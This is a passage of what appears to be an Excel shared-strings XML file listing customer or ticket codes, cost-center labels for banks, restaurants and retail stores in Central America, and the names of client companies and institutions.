    <t>F4516630</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_CAMOJA_055</t>
  </si>
  <si>
    <t>F4515309</t>
  </si>
  <si>
    <t>F4513130</t>
  </si>
  <si>
    <t>F4514783</t>
  </si>
  <si>
    <t>1010783OH</t>
  </si>
  <si>
    <t>F4514147</t>
  </si>
  <si>
    <t>F4524518</t>
  </si>
  <si>
    <t>F4524519</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_INTERNET_C703</t>
  </si>
  <si>
    <t>MP230427020SSV</t>
  </si>
  <si>
    <t>5321930ON</t>
  </si>
  <si>
    <t>LALA</t>
  </si>
  <si>
    <t>F4525827</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0075</t>
  </si>
  <si>
    <t>ID1028582SV</t>
  </si>
  <si>
    <t>1291846OH</t>
  </si>
  <si>
    <t>90001909414T</t>
  </si>
  <si>
    <t>90001909763T</t>
  </si>
  <si>
    <t>90001907802T</t>
  </si>
  <si>
    <t>F4524498</t>
  </si>
  <si>
    <t>F4524875</t>
  </si>
  <si>
    <t>90001903417T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C673</t>
  </si>
  <si>
    <t>F4526439</t>
  </si>
  <si>
    <t>F4526454</t>
  </si>
  <si>
    <t>47503529T</t>
  </si>
  <si>
    <t>F4526244</t>
  </si>
  <si>
    <t>8901663T</t>
  </si>
  <si>
    <t>F4524386</t>
  </si>
  <si>
    <t>48600008T</t>
  </si>
  <si>
    <t>5037225ON</t>
  </si>
  <si>
    <t>ID1208007SV</t>
  </si>
  <si>
    <t>JAIME ERNESTO DELGADO AGUILAR</t>
  </si>
  <si>
    <t>F4525789</t>
  </si>
  <si>
    <t>54700032T</t>
  </si>
  <si>
    <t>ID1097001SV</t>
  </si>
  <si>
    <t>GRANJA SAN DIEGO,S.A DE C.V.</t>
  </si>
  <si>
    <t>F4518287</t>
  </si>
  <si>
    <t>F4524806</t>
  </si>
  <si>
    <t>758500224T</t>
  </si>
  <si>
    <t>F4526210</t>
  </si>
  <si>
    <t>8902285T</t>
  </si>
  <si>
    <t>F4526174</t>
  </si>
  <si>
    <t>CC_FICOHSA_GT_INTERNET_AGENCIA_0584</t>
  </si>
  <si>
    <t>1269209OH</t>
  </si>
  <si>
    <t>483200011T</t>
  </si>
  <si>
    <t>254100030T</t>
  </si>
  <si>
    <t>F4526021</t>
  </si>
  <si>
    <t>265900321T</t>
  </si>
  <si>
    <t>F4526022</t>
  </si>
  <si>
    <t>F4524807</t>
  </si>
  <si>
    <t>F4524953</t>
  </si>
  <si>
    <t>F4526024</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0363</t>
  </si>
  <si>
    <t>F4524954</t>
  </si>
  <si>
    <t>F4525091</t>
  </si>
  <si>
    <t>90001908042T</t>
  </si>
  <si>
    <t>F4525586</t>
  </si>
  <si>
    <t>1188327OH</t>
  </si>
  <si>
    <t>F4526049</t>
  </si>
  <si>
    <t>F4526088</t>
  </si>
  <si>
    <t>4232596ON</t>
  </si>
  <si>
    <t>F4525225</t>
  </si>
  <si>
    <t>F4520260</t>
  </si>
  <si>
    <t>F4525570</t>
  </si>
  <si>
    <t>4939712ON</t>
  </si>
  <si>
    <t>F4526390</t>
  </si>
  <si>
    <t>25258600SV</t>
  </si>
  <si>
    <t>INVERSIONES LA FUENTE S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4517742</t>
  </si>
  <si>
    <t>FH3361</t>
  </si>
  <si>
    <t>F4524985</t>
  </si>
  <si>
    <t>F4526422</t>
  </si>
  <si>
    <t>8902506T</t>
  </si>
  <si>
    <t>F4517743</t>
  </si>
  <si>
    <t>599828OH</t>
  </si>
  <si>
    <t>F4513503</t>
  </si>
  <si>
    <t>CONTR0002800282OC</t>
  </si>
  <si>
    <t>DHL CUSTOMS (COSTA RICA) S. A</t>
  </si>
  <si>
    <t>F4515557</t>
  </si>
  <si>
    <t>F4515558</t>
  </si>
  <si>
    <t>770600024T</t>
  </si>
  <si>
    <t>38300693T</t>
  </si>
  <si>
    <t>INTELCOM_DEFAULT_GT</t>
  </si>
  <si>
    <t>47502072T</t>
  </si>
  <si>
    <t>774200001T</t>
  </si>
  <si>
    <t>PR SOLUTIONS</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_048</t>
  </si>
  <si>
    <t>8900629T</t>
  </si>
  <si>
    <t>F4523343</t>
  </si>
  <si>
    <t>25002600SV</t>
  </si>
  <si>
    <t>22396500SV</t>
  </si>
  <si>
    <t>F4525248</t>
  </si>
  <si>
    <t>F4525534</t>
  </si>
  <si>
    <t>F4525535</t>
  </si>
  <si>
    <t>903600001T</t>
  </si>
  <si>
    <t>ALIMENTOS BUENA VIDA, S.A.</t>
  </si>
  <si>
    <t>IP2136036SV</t>
  </si>
  <si>
    <t>F4526082</t>
  </si>
  <si>
    <t>F4526081</t>
  </si>
  <si>
    <t>544400002T</t>
  </si>
  <si>
    <t>LABORATORIOS UNIDOS, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4526160</t>
  </si>
  <si>
    <t>F4517482</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_064</t>
  </si>
  <si>
    <t>F4514176</t>
  </si>
  <si>
    <t>F4524553</t>
  </si>
  <si>
    <t>F4524554</t>
  </si>
  <si>
    <t>F4524465</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_037</t>
  </si>
  <si>
    <t>F4525170</t>
  </si>
  <si>
    <t>F4526118</t>
  </si>
  <si>
    <t>F4526119</t>
  </si>
  <si>
    <t>F4526087</t>
  </si>
  <si>
    <t>F4526061</t>
  </si>
  <si>
    <t>F4526294</t>
  </si>
  <si>
    <t>F4517483</t>
  </si>
  <si>
    <t>625900217T</t>
  </si>
  <si>
    <t>F4514102</t>
  </si>
  <si>
    <t>349900373T</t>
  </si>
  <si>
    <t>F4523208</t>
  </si>
  <si>
    <t>22406900SV</t>
  </si>
  <si>
    <t>COURIER INTERNATIONAL</t>
  </si>
  <si>
    <t>F4514708</t>
  </si>
  <si>
    <t>F4523721</t>
  </si>
  <si>
    <t>F4523761</t>
  </si>
  <si>
    <t>F4524068</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_AMATITLAN</t>
  </si>
  <si>
    <t>F4524556</t>
  </si>
  <si>
    <t>863400029T</t>
  </si>
  <si>
    <t>25105500SV</t>
  </si>
  <si>
    <t>QUALICONS SA DE CV</t>
  </si>
  <si>
    <t>F4525446</t>
  </si>
  <si>
    <t>38300506T</t>
  </si>
  <si>
    <t>625900143T</t>
  </si>
  <si>
    <t>F4524892</t>
  </si>
  <si>
    <t>619473OH</t>
  </si>
  <si>
    <t>F4526292</t>
  </si>
  <si>
    <t>F4526040</t>
  </si>
  <si>
    <t>F4526041</t>
  </si>
  <si>
    <t>F4526042</t>
  </si>
  <si>
    <t>F4526043</t>
  </si>
  <si>
    <t>349900375T</t>
  </si>
  <si>
    <t>F4524086</t>
  </si>
  <si>
    <t>F4524089</t>
  </si>
  <si>
    <t>F4524812</t>
  </si>
  <si>
    <t>CC_GMG_SV_T042_USULUTAN</t>
  </si>
  <si>
    <t>IDG000428SV</t>
  </si>
  <si>
    <t>HMCR SOLUTIONS SA DE CV</t>
  </si>
  <si>
    <t>F4517728</t>
  </si>
  <si>
    <t>F4523190</t>
  </si>
  <si>
    <t>F4523242</t>
  </si>
  <si>
    <t>F4523244</t>
  </si>
  <si>
    <t>F4523334</t>
  </si>
  <si>
    <t>22979500SV</t>
  </si>
  <si>
    <t>F4524140</t>
  </si>
  <si>
    <t>MP120834005SSV</t>
  </si>
  <si>
    <t>F4525280</t>
  </si>
  <si>
    <t>F4525281</t>
  </si>
  <si>
    <t>F4525988</t>
  </si>
  <si>
    <t>F4524095</t>
  </si>
  <si>
    <t>F4517776</t>
  </si>
  <si>
    <t>F4520037</t>
  </si>
  <si>
    <t>38300502T</t>
  </si>
  <si>
    <t>90001909909T</t>
  </si>
  <si>
    <t>F4514919</t>
  </si>
  <si>
    <t>F4523322</t>
  </si>
  <si>
    <t>F4524957</t>
  </si>
  <si>
    <t>F4525345</t>
  </si>
  <si>
    <t>F4525457</t>
  </si>
  <si>
    <t>692365OH</t>
  </si>
  <si>
    <t>F4526142</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_DOLORES</t>
  </si>
  <si>
    <t>F4526379</t>
  </si>
  <si>
    <t>F4526377</t>
  </si>
  <si>
    <t>8901627T</t>
  </si>
  <si>
    <t>F4526385</t>
  </si>
  <si>
    <t>F4520093</t>
  </si>
  <si>
    <t>F4522151</t>
  </si>
  <si>
    <t>F4514411</t>
  </si>
  <si>
    <t>F4524815</t>
  </si>
  <si>
    <t>F4525216</t>
  </si>
  <si>
    <t>F4526350</t>
  </si>
  <si>
    <t>42700333T</t>
  </si>
  <si>
    <t>F4526354</t>
  </si>
  <si>
    <t>5430211ON</t>
  </si>
  <si>
    <t>MINSA</t>
  </si>
  <si>
    <t>F4515253</t>
  </si>
  <si>
    <t>F4522645</t>
  </si>
  <si>
    <t>CONTR0001221110OC</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3485</t>
  </si>
  <si>
    <t>F4525465</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_LA_ESPERANZA</t>
  </si>
  <si>
    <t>4781726ON</t>
  </si>
  <si>
    <t>24860600SV</t>
  </si>
  <si>
    <t>FLORES MENJIVAR OSCAR ALBERTO</t>
  </si>
  <si>
    <t>F4522237</t>
  </si>
  <si>
    <t>F4515359</t>
  </si>
  <si>
    <t>F4515676</t>
  </si>
  <si>
    <t>IP2085021SV</t>
  </si>
  <si>
    <t>F4513092</t>
  </si>
  <si>
    <t>F4515677</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0337</t>
  </si>
  <si>
    <t>ID1029453SV</t>
  </si>
  <si>
    <t>GRUPO LD S.A DE C.V.</t>
  </si>
  <si>
    <t>1135891OH</t>
  </si>
  <si>
    <t>F4517531</t>
  </si>
  <si>
    <t>530900001T</t>
  </si>
  <si>
    <t>INVERSIONES INTERNACIONALES J&amp;R S.A.</t>
  </si>
  <si>
    <t>F4513241</t>
  </si>
  <si>
    <t>F4513242</t>
  </si>
  <si>
    <t>F4517387</t>
  </si>
  <si>
    <t>F4515226</t>
  </si>
  <si>
    <t>F4513240</t>
  </si>
  <si>
    <t>F4519101</t>
  </si>
  <si>
    <t>344400276T</t>
  </si>
  <si>
    <t>F4522921</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0120</t>
  </si>
  <si>
    <t>F4522964</t>
  </si>
  <si>
    <t>F4522880</t>
  </si>
  <si>
    <t>F4522960</t>
  </si>
  <si>
    <t>F4522882</t>
  </si>
  <si>
    <t>F4522853</t>
  </si>
  <si>
    <t>619336OH</t>
  </si>
  <si>
    <t>F4522956</t>
  </si>
  <si>
    <t>F4522911</t>
  </si>
  <si>
    <t>1433079OH</t>
  </si>
  <si>
    <t>F4523189</t>
  </si>
  <si>
    <t>MP240925010SSV</t>
  </si>
  <si>
    <t>AES CLESA Y COMPANIA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4521850</t>
  </si>
  <si>
    <t>90001911018T</t>
  </si>
  <si>
    <t>F4519171</t>
  </si>
  <si>
    <t>665971OH</t>
  </si>
  <si>
    <t>F4522382</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_14</t>
  </si>
  <si>
    <t>F4515670</t>
  </si>
  <si>
    <t>578500001T</t>
  </si>
  <si>
    <t>PLASTICOS MAXIMOS, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>IP2112177SV</t>
  </si>
  <si>
    <t>F4518197</t>
  </si>
  <si>
    <t>1681905OH</t>
  </si>
  <si>
    <t>F4519000</t>
  </si>
  <si>
    <t>1038470OH</t>
  </si>
  <si>
    <t>F4513109</t>
  </si>
  <si>
    <t>344400294T</t>
  </si>
  <si>
    <t>F4512858</t>
  </si>
  <si>
    <t>446100001T</t>
  </si>
  <si>
    <t>F4517201</t>
  </si>
  <si>
    <t>F4515917</t>
  </si>
  <si>
    <t>F4514002</t>
  </si>
  <si>
    <t>F4516535</t>
  </si>
  <si>
    <t>F4516536</t>
  </si>
  <si>
    <t>F4515357</t>
  </si>
  <si>
    <t>F4513540</t>
  </si>
  <si>
    <t>F4518198</t>
  </si>
  <si>
    <t>297400753T</t>
  </si>
  <si>
    <t>90001910204T</t>
  </si>
  <si>
    <t>F4520101</t>
  </si>
  <si>
    <t>668900004T</t>
  </si>
  <si>
    <t>F4523451</t>
  </si>
  <si>
    <t>F4514235</t>
  </si>
  <si>
    <t>313900407T</t>
  </si>
  <si>
    <t>F4517466</t>
  </si>
  <si>
    <t>F4516965</t>
  </si>
  <si>
    <t>1702137OH</t>
  </si>
  <si>
    <t>F4513111</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_TIENDA_4037</t>
  </si>
  <si>
    <t>F4518222</t>
  </si>
  <si>
    <t>F4519092</t>
  </si>
  <si>
    <t>F4519095</t>
  </si>
  <si>
    <t>IP2299000SV</t>
  </si>
  <si>
    <t>C-0121410102XT</t>
  </si>
  <si>
    <t>F4514276</t>
  </si>
  <si>
    <t>F4515949</t>
  </si>
  <si>
    <t>872600050T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3808</t>
  </si>
  <si>
    <t>522100005T</t>
  </si>
  <si>
    <t>F4517395</t>
  </si>
  <si>
    <t>550500001T</t>
  </si>
  <si>
    <t>BUSINESS FASHION GROUP S.A.</t>
  </si>
  <si>
    <t>F4518693</t>
  </si>
  <si>
    <t>3557244ON</t>
  </si>
  <si>
    <t>839400001T</t>
  </si>
  <si>
    <t>SERVICIOS PORTATILES S.A.</t>
  </si>
  <si>
    <t>F4523003</t>
  </si>
  <si>
    <t>ID1029410SV</t>
  </si>
  <si>
    <t>GANO ITOUCH SA DE CV</t>
  </si>
  <si>
    <t>25262900SV</t>
  </si>
  <si>
    <t>ADUANERA DEL PACIFICO S.A .DE C.V.</t>
  </si>
  <si>
    <t>F4516220</t>
  </si>
  <si>
    <t>F4516569</t>
  </si>
  <si>
    <t>F4516887</t>
  </si>
  <si>
    <t>F4517685</t>
  </si>
  <si>
    <t>90001910996T</t>
  </si>
  <si>
    <t>F4521896</t>
  </si>
  <si>
    <t>8900243T</t>
  </si>
  <si>
    <t>F4515925</t>
  </si>
  <si>
    <t>F4515926</t>
  </si>
  <si>
    <t>F4515426</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0865</t>
  </si>
  <si>
    <t>25245900SV</t>
  </si>
  <si>
    <t>EUROAIRE S.A. DE C.V.</t>
  </si>
  <si>
    <t>24010600SV</t>
  </si>
  <si>
    <t>CORPORACION HERMANOS MARISTAS DEL SALVADOR</t>
  </si>
  <si>
    <t>810900006T</t>
  </si>
  <si>
    <t>UNIVERSIDAD DA VINCI DE GUATEMALA</t>
  </si>
  <si>
    <t>F4518300</t>
  </si>
  <si>
    <t>F4518990</t>
  </si>
  <si>
    <t>F4521693</t>
  </si>
  <si>
    <t>F4521822</t>
  </si>
  <si>
    <t>CC_GMG_SV_T055_SAN_MIGUEL</t>
  </si>
  <si>
    <t>F4517417</t>
  </si>
  <si>
    <t>F4517419</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4471</t>
  </si>
  <si>
    <t>608800001T</t>
  </si>
  <si>
    <t>TODO RIESGO CORREDORES DE SEGUROS, S.A.</t>
  </si>
  <si>
    <t>F4519853</t>
  </si>
  <si>
    <t>673000018T</t>
  </si>
  <si>
    <t>38300650T</t>
  </si>
  <si>
    <t>F4522865</t>
  </si>
  <si>
    <t>340500149T</t>
  </si>
  <si>
    <t>1724045OH</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3061</t>
  </si>
  <si>
    <t>F4513212</t>
  </si>
  <si>
    <t>8900680T</t>
  </si>
  <si>
    <t>F4515932</t>
  </si>
  <si>
    <t>F4513578</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_JACARANDAS</t>
  </si>
  <si>
    <t>1681464OH</t>
  </si>
  <si>
    <t>IP2034030SV</t>
  </si>
  <si>
    <t>90001906506T</t>
  </si>
  <si>
    <t>F4522934</t>
  </si>
  <si>
    <t>F4517390</t>
  </si>
  <si>
    <t>IP2149070SV</t>
  </si>
  <si>
    <t>671900074T</t>
  </si>
  <si>
    <t>406400085T</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4037</t>
  </si>
  <si>
    <t>F4517684</t>
  </si>
  <si>
    <t>F4520184</t>
  </si>
  <si>
    <t>F4513562</t>
  </si>
  <si>
    <t>47503291T</t>
  </si>
  <si>
    <t>505700001T</t>
  </si>
  <si>
    <t>MAQUINARIA E INSUMOS INDUSTRIALES S.A.</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C144</t>
  </si>
  <si>
    <t>IP2148141SV</t>
  </si>
  <si>
    <t>1678162OH</t>
  </si>
  <si>
    <t>F4516927</t>
  </si>
  <si>
    <t>5206920ON</t>
  </si>
  <si>
    <t>F4513585</t>
  </si>
  <si>
    <t>61200235T</t>
  </si>
  <si>
    <t>F4518353</t>
  </si>
  <si>
    <t>F4519301</t>
  </si>
  <si>
    <t>F4522057</t>
  </si>
  <si>
    <t>F4522364</t>
  </si>
  <si>
    <t>F4522983</t>
  </si>
  <si>
    <t>3627036ON</t>
  </si>
  <si>
    <t>774518OH</t>
  </si>
  <si>
    <t>F4522395</t>
  </si>
  <si>
    <t>1681494OH</t>
  </si>
  <si>
    <t>F4523201</t>
  </si>
  <si>
    <t>F4514159</t>
  </si>
  <si>
    <t>47504188T</t>
  </si>
  <si>
    <t>F4517415</t>
  </si>
  <si>
    <t>F4516706</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3028</t>
  </si>
  <si>
    <t>F4517418</t>
  </si>
  <si>
    <t>722000OH</t>
  </si>
  <si>
    <t>F4518357</t>
  </si>
  <si>
    <t>F4520700</t>
  </si>
  <si>
    <t>IP2028603SV</t>
  </si>
  <si>
    <t>INDY MOTOS SA DE CV</t>
  </si>
  <si>
    <t>IP2024388SV</t>
  </si>
  <si>
    <t>1720869OH</t>
  </si>
  <si>
    <t>OH1000810684</t>
  </si>
  <si>
    <t>F4520965</t>
  </si>
  <si>
    <t>F4520887</t>
  </si>
  <si>
    <t>F4520998</t>
  </si>
  <si>
    <t>F4521937</t>
  </si>
  <si>
    <t>758500096T</t>
  </si>
  <si>
    <t>1530073OH</t>
  </si>
  <si>
    <t>F4522120</t>
  </si>
  <si>
    <t>F4522117</t>
  </si>
  <si>
    <t>F4522054</t>
  </si>
  <si>
    <t>F4522055</t>
  </si>
  <si>
    <t>8901576T</t>
  </si>
  <si>
    <t>F4521961</t>
  </si>
  <si>
    <t>IDG000017SV</t>
  </si>
  <si>
    <t>UBIQUITY GLOBAL SERVICE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4522058</t>
  </si>
  <si>
    <t>8902053T</t>
  </si>
  <si>
    <t>F4522115</t>
  </si>
  <si>
    <t>F4518945</t>
  </si>
  <si>
    <t>F4518942</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3127</t>
  </si>
  <si>
    <t>48500032T</t>
  </si>
  <si>
    <t>UNIVERSIDAD FRANCISCO MARROQUIN</t>
  </si>
  <si>
    <t>F4518863</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0016</t>
  </si>
  <si>
    <t>F4518810</t>
  </si>
  <si>
    <t>F4518813</t>
  </si>
  <si>
    <t>F4518815</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0517</t>
  </si>
  <si>
    <t>90001901498T</t>
  </si>
  <si>
    <t>F4518936</t>
  </si>
  <si>
    <t>943300002T</t>
  </si>
  <si>
    <t>CLUB CAMPESTRE LA MONTAÑA</t>
  </si>
  <si>
    <t>515500004T</t>
  </si>
  <si>
    <t>ENTRE NEGOCIANTES</t>
  </si>
  <si>
    <t>963464OH</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0139</t>
  </si>
  <si>
    <t>48600009T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C690</t>
  </si>
  <si>
    <t>F4516769</t>
  </si>
  <si>
    <t>F4516784</t>
  </si>
  <si>
    <t>F4518054</t>
  </si>
  <si>
    <t>CONTR0002484025OC</t>
  </si>
  <si>
    <t>759584OH</t>
  </si>
  <si>
    <t>F4532818</t>
  </si>
  <si>
    <t>F4519905</t>
  </si>
  <si>
    <t>8902655T</t>
  </si>
  <si>
    <t>290800020T</t>
  </si>
  <si>
    <t>F4520960</t>
  </si>
  <si>
    <t>F4515988</t>
  </si>
  <si>
    <t>F4517421</t>
  </si>
  <si>
    <t>F4517564</t>
  </si>
  <si>
    <t>F4517567</t>
  </si>
  <si>
    <t>F4519127</t>
  </si>
  <si>
    <t>F4522389</t>
  </si>
  <si>
    <t>ID1028571SV</t>
  </si>
  <si>
    <t>ASOC.COOP.DE A Y CREDITO,R.L</t>
  </si>
  <si>
    <t>261100010T</t>
  </si>
  <si>
    <t>CC_GMG_SV_T076_LA_LIBERTAD</t>
  </si>
  <si>
    <t>F4517563</t>
  </si>
  <si>
    <t>F4514662</t>
  </si>
  <si>
    <t>19600012T</t>
  </si>
  <si>
    <t>F4519875</t>
  </si>
  <si>
    <t>F4520977</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3852</t>
  </si>
  <si>
    <t>F4513564</t>
  </si>
  <si>
    <t>F4514839</t>
  </si>
  <si>
    <t>F4515386</t>
  </si>
  <si>
    <t>F4514833</t>
  </si>
  <si>
    <t>F4515667</t>
  </si>
  <si>
    <t>361700004T</t>
  </si>
  <si>
    <t>22671510SV</t>
  </si>
  <si>
    <t>IGLESIA CATOLICA APOSTOLICA Y ROMANA EN EL SALVADOR.ARQ,S.S.</t>
  </si>
  <si>
    <t>IP2374002SV</t>
  </si>
  <si>
    <t>IP2145258SV</t>
  </si>
  <si>
    <t>F4520983</t>
  </si>
  <si>
    <t>F4522181</t>
  </si>
  <si>
    <t>F4522220</t>
  </si>
  <si>
    <t>F4522286</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C104</t>
  </si>
  <si>
    <t>F4514842</t>
  </si>
  <si>
    <t>F4514843</t>
  </si>
  <si>
    <t>F4516475</t>
  </si>
  <si>
    <t>90001909018T</t>
  </si>
  <si>
    <t>F4523143</t>
  </si>
  <si>
    <t>F4514152</t>
  </si>
  <si>
    <t>47501515T</t>
  </si>
  <si>
    <t>551500029T</t>
  </si>
  <si>
    <t>F4517067</t>
  </si>
  <si>
    <t>F4514296</t>
  </si>
  <si>
    <t>IDG000543SV</t>
  </si>
  <si>
    <t>F4519364</t>
  </si>
  <si>
    <t>1415513OH</t>
  </si>
  <si>
    <t>F4522377</t>
  </si>
  <si>
    <t>F4516883</t>
  </si>
  <si>
    <t>F4516884</t>
  </si>
  <si>
    <t>F4519772</t>
  </si>
  <si>
    <t>F4521579</t>
  </si>
  <si>
    <t>F4521699</t>
  </si>
  <si>
    <t>8600189T</t>
  </si>
  <si>
    <t>F4523295</t>
  </si>
  <si>
    <t>1486066OH</t>
  </si>
  <si>
    <t>DESARROLLADORA Y OPERADORA DE INFRAESTRUCTURA DE HONDURAS / D.O.I.H</t>
  </si>
  <si>
    <t>344400145T</t>
  </si>
  <si>
    <t>1714167OH</t>
  </si>
  <si>
    <t>OH1001074872</t>
  </si>
  <si>
    <t>38300499T</t>
  </si>
  <si>
    <t>1614084OH</t>
  </si>
  <si>
    <t>F4523412</t>
  </si>
  <si>
    <t>CONTR0001445556OC</t>
  </si>
  <si>
    <t>F4524071</t>
  </si>
  <si>
    <t>F4512781</t>
  </si>
  <si>
    <t>20558397</t>
  </si>
  <si>
    <t>F4512739</t>
  </si>
  <si>
    <t>F4518780</t>
  </si>
  <si>
    <t>8902080T</t>
  </si>
  <si>
    <t>CONTR0001515121OC</t>
  </si>
  <si>
    <t>1525946OH</t>
  </si>
  <si>
    <t>F4513272</t>
  </si>
  <si>
    <t>20538268</t>
  </si>
  <si>
    <t>F4519055</t>
  </si>
  <si>
    <t>F4525279</t>
  </si>
  <si>
    <t>F4513475</t>
  </si>
  <si>
    <t>F4512784</t>
  </si>
  <si>
    <t>F4512754</t>
  </si>
  <si>
    <t>349900336T</t>
  </si>
  <si>
    <t>F4513726</t>
  </si>
  <si>
    <t>F4515753</t>
  </si>
  <si>
    <t>IP2053060SV</t>
  </si>
  <si>
    <t>F4517824</t>
  </si>
  <si>
    <t>40300062T</t>
  </si>
  <si>
    <t>F4519027</t>
  </si>
  <si>
    <t>F4523053</t>
  </si>
  <si>
    <t>F4525414</t>
  </si>
  <si>
    <t>F4525502</t>
  </si>
  <si>
    <t>F4525415</t>
  </si>
  <si>
    <t>F4515754</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SANARATE</t>
  </si>
  <si>
    <t>560300006T</t>
  </si>
  <si>
    <t>RADIO VISION SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>IP2324010SV</t>
  </si>
  <si>
    <t>926000001T</t>
  </si>
  <si>
    <t>CONDOMINIO GRAN CENTRO LOS PROCERES</t>
  </si>
  <si>
    <t>F4513889</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_C693</t>
  </si>
  <si>
    <t>F4513714</t>
  </si>
  <si>
    <t>F4512989</t>
  </si>
  <si>
    <t>F4513029</t>
  </si>
  <si>
    <t>1366892OH</t>
  </si>
  <si>
    <t>F4520264</t>
  </si>
  <si>
    <t>F4523991</t>
  </si>
  <si>
    <t>F4524123</t>
  </si>
  <si>
    <t>F4525129</t>
  </si>
  <si>
    <t>F4513890</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C693</t>
  </si>
  <si>
    <t>F4517861</t>
  </si>
  <si>
    <t>F4520177</t>
  </si>
  <si>
    <t>5114020ON</t>
  </si>
  <si>
    <t>ON0002057566/CASA PELLAS S.A.</t>
  </si>
  <si>
    <t>365400084T</t>
  </si>
  <si>
    <t>ID1038280SV</t>
  </si>
  <si>
    <t>F4517816</t>
  </si>
  <si>
    <t>910400058T</t>
  </si>
  <si>
    <t>F4518201</t>
  </si>
  <si>
    <t>F4520044</t>
  </si>
  <si>
    <t>F4524114</t>
  </si>
  <si>
    <t>F4525278</t>
  </si>
  <si>
    <t>IP2033023SV</t>
  </si>
  <si>
    <t>832000040T</t>
  </si>
  <si>
    <t>F4525120</t>
  </si>
  <si>
    <t>641800002T</t>
  </si>
  <si>
    <t>ALIMENTOS PARA ANIMALES S.A.</t>
  </si>
  <si>
    <t>F4516189</t>
  </si>
  <si>
    <t>F4517456</t>
  </si>
  <si>
    <t>F4513081</t>
  </si>
  <si>
    <t>467240ON</t>
  </si>
  <si>
    <t>F4524565</t>
  </si>
  <si>
    <t>F4516491</t>
  </si>
  <si>
    <t>F4516492</t>
  </si>
  <si>
    <t>F4516490</t>
  </si>
  <si>
    <t>F4512807</t>
  </si>
  <si>
    <t>F4513181</t>
  </si>
  <si>
    <t>F4517874</t>
  </si>
  <si>
    <t>357400020T</t>
  </si>
  <si>
    <t>F4518207</t>
  </si>
  <si>
    <t>F4518449</t>
  </si>
  <si>
    <t>F4514804</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0049</t>
  </si>
  <si>
    <t>288700023T</t>
  </si>
  <si>
    <t>F4520502</t>
  </si>
  <si>
    <t>F4523355</t>
  </si>
  <si>
    <t>IPG003914SV</t>
  </si>
  <si>
    <t>506658ON</t>
  </si>
  <si>
    <t>F4513265</t>
  </si>
  <si>
    <t>F4516175</t>
  </si>
  <si>
    <t>90001902390T</t>
  </si>
  <si>
    <t>25360600SV</t>
  </si>
  <si>
    <t>EMBAJADA DE PANAMA</t>
  </si>
  <si>
    <t>F4514370</t>
  </si>
  <si>
    <t>806300448T</t>
  </si>
  <si>
    <t>F4513360</t>
  </si>
  <si>
    <t>F4518482</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_FRANCISCO</t>
  </si>
  <si>
    <t>344400174T</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_PLAZA_ZONA_4</t>
  </si>
  <si>
    <t>38300551T</t>
  </si>
  <si>
    <t>F4524363</t>
  </si>
  <si>
    <t>F4525277</t>
  </si>
  <si>
    <t>F4514880</t>
  </si>
  <si>
    <t>F4515689</t>
  </si>
  <si>
    <t>787700007T</t>
  </si>
  <si>
    <t>SAUL E. MENDEZ - CORPORACION MERINO</t>
  </si>
  <si>
    <t>F4515693</t>
  </si>
  <si>
    <t>826900033T</t>
  </si>
  <si>
    <t>F4512951</t>
  </si>
  <si>
    <t>F4515113</t>
  </si>
  <si>
    <t>944900008T</t>
  </si>
  <si>
    <t>ORGANISMO LEGISLATIVO  .</t>
  </si>
  <si>
    <t>554600001T</t>
  </si>
  <si>
    <t>ASOCIACION AMIGAS DE SAN VICENTE</t>
  </si>
  <si>
    <t>F4520026</t>
  </si>
  <si>
    <t>F4520163</t>
  </si>
  <si>
    <t>625900223T</t>
  </si>
  <si>
    <t>F4524542</t>
  </si>
  <si>
    <t>F4524543</t>
  </si>
  <si>
    <t>F4524850</t>
  </si>
  <si>
    <t>F4524852</t>
  </si>
  <si>
    <t>5262662ON</t>
  </si>
  <si>
    <t>ON0000450863/SINSA ALTAMIRA/NESTOR SILVA CABRERA</t>
  </si>
  <si>
    <t>F4516179</t>
  </si>
  <si>
